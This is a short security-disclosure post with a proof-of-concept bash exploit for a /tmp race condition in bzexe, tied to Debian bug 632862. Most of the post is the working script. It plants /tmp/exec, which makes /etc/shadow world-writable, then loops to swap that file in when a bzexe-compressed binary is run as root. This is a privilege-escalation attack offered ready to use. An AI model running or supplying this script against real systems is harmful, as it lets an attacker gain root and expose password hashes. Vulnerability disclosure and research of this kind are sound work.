bzexe /tmp Race Condition

`Hi Packetstorm,  
  
This PoC exploit was developed after a discussion on Full-disclosure  
mailing list, where  
http://bugs.debian.org/cgi-bin/bugreport.cgi?bug=632862  
was proved to be exploitable. A user can wait until a binary that was  
compressed with bzexe is run by root and execute /tmp/exec. This  
could be used  
to gain access as any user executing bzexe compressed binary as well.  
  
It's probably not common to have binaries compressed unless your on an  
imbedded system.  
  
---- Begin------  
#!/bin/bash  
#gain root on a system using bzexe to compress binaries  
#/tmp/exec will be executed as user executing if we win the race.  
#Larry W. Cashdollar http://www.downspout.org (credit vladz with discovery)  
#http://bugs.debian.org/cgi-bin/bugreport.cgi?bug=632862  
#create /tmp/exec before hand  
  
#echo "Creating malicious script."  
  
echo "#!/bin/sh" > /tmp/exec  
echo "chmod 777 /etc/shadow" >> /tmp/exec  
chmod 755 /tmp/exec  
  
mkdir /tmp/$1  
while true ;  
do  
if [ -a /tmp/$1/gztmp* ]  
then  
# echo "Exploting bzexe."  
mv /tmp/$1 /tmp/$1.dir  
# echo "Copying our evil code into place."  
cp /tmp/exec /tmp/$1  
fi  
done  
  
  
--- End---  
`